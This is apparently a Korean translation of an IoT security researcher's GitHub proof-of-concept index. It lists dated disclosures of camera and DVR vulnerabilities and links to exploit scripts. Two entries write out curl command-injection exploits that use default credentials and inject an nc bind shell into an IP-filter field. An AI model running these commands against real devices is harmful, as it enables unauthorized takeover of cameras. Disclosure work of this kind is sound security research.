
이 PoC들은 단순한 PoC이자 퍼블릭 도메인이며 지원되지 않으므로, Issues가 비활성화되었습니다.
기타 PoC - (불)안전 사물 인터넷
이런 형편없는 (불)안전 제품들에 대해 읽어볼 가치가 충분히 있습니다: https://ipvm.com/reports/security-exploits
2021-10-19
모든 공로는 Watchful_IP에게 있습니다 (https://watchfulip.github.io/)
https://github.com/mcw0/PoC/blob/master/CVE-2021-36260.py
2021-10-06
상세 내용: https://github.com/mcw0/PoC/blob/master/Dahua%20authentication%20bypass.txt
PoC: https://github.com/mcw0/DahuaConsole
2021-09-06
두 개의 독립적인 인증 우회(Authentication Bypass) 취약점.
또 다른 "대규모 Dahua 해킹"이 발생할 가능성이 매우 높기 때문에, 전체 공개(Full Disclosure) 세부 내용은 2021년 10월 6일까지 보류합니다.
그때까지 펌웨어 업그레이드를 강력히 권장합니다.
https://www.dahuasecurity.com/support/cybersecurity/details/957
2020-05-09
https://github.com/mcw0/PoC/blob/master/Dahua-3DES-IMOU-PoC.py
2020-02-29
https://github.com/mcw0/Tools/blob/master/Dahua-JSON-Debug-Console-v2.py
2020-02-15
이번 주에 Dahua PSIRT와 연락이 닿았으며, 23개 서로 다른 클라우드 공급업체에 대한 세부 내용, PoC 및 증거를 제공했습니다. 또한 Google Zero의 'Policy and Disclosure: 2020 Edition' 새로운 방침을 따를 것입니다(제게는 타당하게 여겨지기 때문입니다). 즉, Dahua가 09.05.2020 19:00 UTC(2020년 5월 9일 19:00 UTC) 이전 또는 이후에 업데이트를 출시하든, 90일 후에 공개할 것입니다.
Dahua, 부디 이 날짜 이전에 수정하고 업데이트를 제공해 주세요...
참고: Google Zero 'Policy and Disclosure: 2020 Edition': https://googleprojectzero.blogspot.com/2020/01/policy-and-disclosure-2020-edition.html
2020-02-10
방금 Dahua SDK의 자격 증명 유출(결국 평문으로 노출됨)을 Dahua PSIRT에 공개했습니다. 이 정보를 어떻게 받아들일지 지켜보겠습니다. +20개의 서로 다른 클라우드 제공업체가 연루되어 있다는 점이 꽤 심각합니다... 오늘부터 90일이 흘러갑니다.
2020-01-20
몇 가지 도구를 올릴 예정인 새 저장소를 만들었습니다.
첫 번째: Dahua-JSON-Debug-Console-v2.py
2019-10-06 (옛 자료)
Axis 장치(1998 - 2019)의 모델 및 펌웨어 버전을 익명으로 탐지합니다.
https://github.com/mcw0/PoC/blob/master/axis-detect.py
2019-08-20
https://github.com/mcw0/PoC/blob/master/Realtek-RTL83xx-PoC.py
2019-08-06
https://www.vdoo.com/blog/disclosing-significant-vulnerabilities-network-switches
모든 기술적 세부 내용과 함께 Python PoC가 2019년 8월 20일에 이곳에 게시될 예정입니다.
2019-05-15
다수의 스택 오버플로(Stack Overflow), RCE, 평문 사용자 이름/비밀번호 노출 등
https://github.com/mcw0/PoC/blob/master/LifeSafetyPower-Netlink-PoC.py
2019-04-10
이 스크립트는 일반 HTTP/HTTPS 포트 및 TCP/5000에서 작동하는 Dahua 'DHIP' P2P 바이너리 프로토콜을 사용합니다.
JSON을 사용하여 Dahua 장치 내부의 'Debug Console'에 연결합니다 (이전 TCP/6789 디버그와 동일한 유형).
https://github.com/mcw0/PoC/blob/master/Dahua-DHIP-JSON-Debug-Console.py
즐기세요, bashis
2019-01-23
안녕하세요, 오랜만입니다. 오랫동안 글을 올리지 못했네요...
저는 여전히 활동하며 연구를 계속하고 있습니다. 다만 소식이 있다면, 저는 벤더 관리를 위해 VDOO(https://www.vdoo.com/)와도 협력하려고 하고 있으며, 이로 인해 안타깝게도 전체 공개(Full Disclosure) 프로세스가 다소 지연되었습니다...
어쨌든, 제 GitHub에 전체 공개(Full Disclosure) 형태로 몇 가지 흥미로운 연구 결과가 곧 게시될 예정입니다.
VDOO와의 협력을 통해 제가 하고 싶은 작업에 집중할 수 있고, (원하지 않거나 | 이해하지 못하거나 | 무시하려 하거나 | 지연시키려 하거나 | 어쨌든 간에) 그러한 벤더들과 시간을 낭비하지 않아도 됩니다.
가장 최근 것은 일부 Reolink(https://reolink.com/) 관련 자료이며, 여기에서 확인할 수 있습니다: https://www.vdoo.com/blog/working-with-the-community-%E2%80%93-significant-vulnerabilities-in-reolink-cameras/.
2018-06-18
AVTECH {DVR/NVR/IPC} 힙 오버플로(Heap Overflow), IPCP API, RCE
https://github.com/mcw0/PoC/blob/master/Avtech_Undocumented_API_and_RCE.txt
https://github.com/mcw0/PoC/blob/master/AVTECH-IPCP-RCE.py
2018-06-03
Reolink {IPC} RCE (인증됨)
https://github.com/mcw0/PoC/blob/master/Reolink-IPC-RCE.py
2018-04-09
Shenzhen TVT Digital Technology Co. Ltd 및 OEM {DVR/NVR/IPC} API RCE https://github.com/mcw0/PoC/blob/master/TVT_and_OEM_IPC_NVR_DVR_RCE_Backdoor_and_Information_Disclosure.txt https://github.com/mcw0/PoC/blob/master/TVT-PoC.py
2018-03-05
AVTECH {DVR/NVR/IPC} 인증된 RCE (Authenticated RCE)
https://github.com/mcw0/PoC/blob/master/AVTECH-RCE.py
2018-02-01
Geovision Inc. IP 카메라/비디오/출입 통제 다중 원격 명령 실행 - 다중 스택 오버플로 - 이중 해제(Double free) - 무단 접근 https://github.com/mcw0/PoC/blob/master/Geovision%20IP%20Camera%20Multiple%20Remote%20Command%20Execution%20-%20Multiple%20Stack%20Overflow%20-%20Double%20free%20-%20Unauthorized%20Access.txt
Geovision Inc. IP 카메라 및 비디오 서버 원격 명령 실행 PoC https://github.com/mcw0/PoC/blob/master/Geovision-PoC.py
2018-01-22
Herospeed TelnetSwitch 데몬은 TCP/787에서 실행되며, telnetd를 활성화할 수 있게 해줍니다. 하나의 작은 스택 오버플로로 동적으로 생성된 비밀번호를 덮어쓰고 telnetd를 활성화할 수 있습니다. https://github.com/mcw0/PoC/blob/master/Herospeed-TelnetSwitch.py
2018-01-15
Foscam IPC 펌웨어 이미지에 대해 다양한 암호화 키/다이제스트 및 암호를 반복 실행하는 작은 OpenSSL 래퍼입니다. https://github.com/mcw0/PoC/blob/master/decrypt-foscam.py
여러 Foscam IPC 바이너리 및 라이브러리에서 문자열/로그인/비밀번호/암호화 키 난독화 해제(Deobfuscate) https://github.com/mcw0/PoC/blob/master/deobfuscate-foscam.py
2017-12-22
https://github.com/mcw0/PoC/blob/master/Vitek_RCE_and_information_disclosure.txt
2017-12-14
https://github.com/mcw0/PoC/blob/master/Remote_Stack_Format_String_multiple%20OEM.txt
2017-12-05
https://github.com/mcw0/PoC/blob/master/tiny-w3-mcw.c
2017-12-03
// Enable 'IP Filter'
curl --user ADMIN:1234 -v -X POST http://[IP:PORT]/form/formChangeFirewallState -d "state=2"
// Add to 'IP Filter' and execute
curl --user ADMIN:1234 -v -X POST http://[IP:PORT]/form/AddIPFilter -d "list=2&type=1&filterIp=$(nc -lp 1337 -e/bin/sh)"
// Disable 'IP Filter'
curl --user ADMIN:1234 -v -X POST http://[IP:PORT]/form/formChangeFirewallState -d "state=0"
// Remove from 'IP Filter'
curl --user ADMIN:1234 -v -X POST http://[IP:PORT]/form/DeleteIPFilter -d "list=2&type=1&filterIp=$(nc -lp 1337 -e/bin/sh)"
2017-12-03
// Enable 'IP Filter'
curl --user admin:admin -v -X POST http://[IP:PORT]/form/formChangeFirewallState -d "state=2"
// Add to 'IP Filter' and execute
curl --user admin:admin -v -X POST http://[IP:PORT]/form/AddIPFilter -d "list=2&type=1&filterIp=$(nc -lp 1337 -e/bin/sh)"
// Disable 'IP Filter'
curl --user admin:admin -v -X POST http://[IP:PORT]/form/formChangeFirewallState -d "state=0"
// Remove from 'IP Filter'
curl --user admin:admin -v -X POST http://[IP:PORT]/form/DeleteIPFilter -d "list=2&type=1&filterIp=$(nc -lp 1337 -e/bin/sh)"
참고: 동일한 코드를 공유하는 추가 OEM이 있을 가능성이 상당히 높습니다.
2017-12-01 Axis Communications MPQT/PACS 힙 오버플로 및 정보 유출 https://github.com/mcw0/PoC/blob/master/Axis_Communications_MPQT_PACS_Heap_Overflow_and_information_leakage.txt
2017-11-13 역방향(Reverse) stunnel TLSv1 프라이버시 셸 https://github.com/mcw0/PoC/blob/master/Reverse%20stunnel%20TLSv1%20privacy%20shell.txt
2017-11-13 Vivotek IP 카메라 - 원격 스택 오버플로 https://github.com/mcw0/PoC/blob/master/Vivotek%20IP%20Cameras%20-%20Remote%20Stack%20Overflow.txt
2017-10-29 Uniview RCE 및 설정(config) 내보내기 PoC https://github.com/mcw0/PoC/blob/master/Uniview%20RCE%20PoC.txt
2017-10-19 2016년 3분기의 오래되어 잊힌 퍼징 하나가 RCE(PoC: 원격 연결 백 셸) 및 /etc/shadow 원격 읽기로 이어졌습니다. Axis에 보고되어 2016년 3분기에 수정되었지만, 좋은 힌트가 될 수 있어 지금도 여기에 게시합니다. https://github.com/mcw0/PoC/blob/master/Axis%20SSI%20RCE
2017-10-17 Dahua에서 Telnetd 활성화 / 비활성화 (최신 펌웨어 버전용) https://github.com/mcw0/PoC/blob/master/dahua-telnetd-json.py
2017-05-03
Dahua 백도어 PoC 공개 재게시 https://github.com/mcw0/PoC/blob/master/dahua-backdoor-PoC.py
2017-03-20
제가 새로 알게 된 취약한 장치들에 대한 정보에 따르면, 믿기 어려울 정도로 많은 1백만 대 이상의 Dahua / OEM 장치가 있으며, 이 정보는 NSFOCUS가 작성한 보고서와 shodan.io에서의 제 연구에서 비롯되었습니다.
이러한 지식을 바탕으로, PoC가 이미 IPVM 및 기타 독립적인 보안 연구자들에 의해 검증되었으므로 더 이상 필요하지 않기에, 앞서 4월 5일에 말한 대로라도 Python PoC를 공개하지 않겠습니다.
그러나 원하신다면 진지한 보안 연구자들과 PoC를 공유할 의향이 있습니다. 메일링 리스트를 통하지 않고(off list) 이메일을 보내주시고, 당신이 누구인지 명확히 밝혀 주시기 바랍니다. 그래야 제가 무시해 버리는 구걸하는 사람으로 오인하지 않을 테니까요.
NSFOCUS 보고서: http://blog.nsfocus.net/dahua-cameras-unauthorized-access-vulnerability-technical-analysis-solution/
/bashis
Dahua 패치의 날짜 및 시간 스탬프를 보셨나요? 다음의 스크린샷을 확인해 보세요. http://us.dahuasecurity.com/en/us/Security-Bulletin_030617.php https://github.com/mcw0/PoC/blob/master/Dahua%20Wiki%20Firmware%20Timestamp.png
https://dahuawiki.com/images/Firmware/DVR/Q2.2017/ https://github.com/mcw0/PoC/blob/master/Dahua%20Wiki%20Firmware%20listing.png
목록에는 NVR/DVR/IPC/HDCVI만 있는 것이 아닙니다.
인터콤 시스템도 포함되어 있으며, VTO2000A가 확인되었습니다. http://www1.dahuasecurity.com/au/products/vto2000a-762.html